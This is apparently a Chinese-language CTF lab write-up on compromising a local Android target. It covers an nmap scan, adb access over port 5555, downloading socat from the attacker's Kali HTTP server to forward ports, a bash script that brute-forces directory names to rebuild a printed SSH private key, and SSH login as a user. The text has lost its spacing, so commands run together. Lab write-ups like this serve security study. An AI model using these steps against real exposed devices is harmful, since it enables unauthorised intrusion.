前言正文1、端口扫描2、安卓端口反向代理3、目录遍历获取RSA密钥4、用户提权前言本文介绍了Kali Linux的基本使用技巧和nmap常见命令重点演示了端口扫描、安卓设备反向代理和权限提升过程。通过nmap扫描发现安卓设备5555端口开放使用adb工具连接后将安卓80端口反向代理到Kali主机的过程。正文1、端口扫描nmap-sV-v-T4-A192.168.31.198发现5555端口开放并且还是android设备。尝试使用adb工具进入shell界面看下安卓开放的端口netstat-lntupuname -m看下这个安卓是啥架构说明这个靶机是 64 位 x86 架构PC / 模拟器环境2、安卓端口反向代理我们得想办法把安卓的80端口代理到我们自己的主机端口上。1在Kali里执行以下命令下载一个静态编译、无依赖的socatcd~/Desktopwgethttps://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat-Osocatchmodx socat2启动Kali的HTTP服务python3-mhttp.server803在安卓里想办法把这个文件传到/home/runner目录下adb shelllscdtmpwget192.168.31.188/socatcpsocat /home/runnercd/home/runnerchmodx socat /home/runner/socat-d-dTCP-LISTEN:9000,fork TCP4:127.0.0.1:80可以通过命令netstat-tuln看看安卓的9000端口启动了没然后在kali里下载一个工具tealdeer更新的时候遇到了问题安装 proxychainsaptupdateaptinstall-yproxychains4编辑配置文件nano/etc/proxychains4.conf把最后一行改成你的代理比如你的代理是 socks5://192.168.3.94:6454# 注释掉原来的 127.0.0.1:9050改成下面这行socks5192.168.3.946454同理Kali里的浏览器也是同理设置用 proxychains 运行 tldr完美解决。proxychains4 tldr--update可以通过以下命令验证一下curl-vhttps://github.com如果 GitHub 也返回 HTML说明代理对 GitHub 是通的。最后代理一下9000端口3、目录遍历获取RSA密钥扫目录的时候发现目录的文件名像RSA私钥这谁能想到所以要把扫到的目录拼接成一个字符串那就写脚本。首先生成标准的base64.txtecho{A..Z}{a..z}{0..9} /|tr \nbase64.txt然后新建一个c.sh放到kali里#!/bin/bashforsin$(seq15)dokeyforkin$(seq70)doforiin$(catbase64.txt)dotmp$key$ia$(curl-shttp://192.168.31.198:9000/line${s}/$tmp)[-z$a]key$tmpbreakdonedoneecho$keydonechmod x把c.sh这个文件权限提高然后执行内容含义 作用ssh-keygen -y -f id2这是核心命令作用是从 SSH 私钥文件生成对应的公钥-ssh-keygenSSH 密钥管理的核心工具--y关键参数“从私钥文件中提取公钥”不会修改原私钥只读生成--f id2指定要读取的私钥文件是当前目录下的id2如果id2不在当前目录需要写完整路径比如/root/Desktop/id2然后把id2的内容改一下格式catid2EOF -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS35f0t/u XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/lavSucQUWuMMjqti3kaZQPEy9J 5felyfQYYFCjURC1emDAAAACWFzYWhpQHBoaQECAwQ -----END OPENSSH PRIVATE KEY----- EOFchmod600id24、用户提权通过命令ssh-keygen-y-fid2拿到用户名通过命令sshasahi192.168.31.198-iid2成功拿到fuzz用户权限查看当前用户可执行的权限到这一步不知道如何文件上传拿到root权限了。后面学明白了再填坑。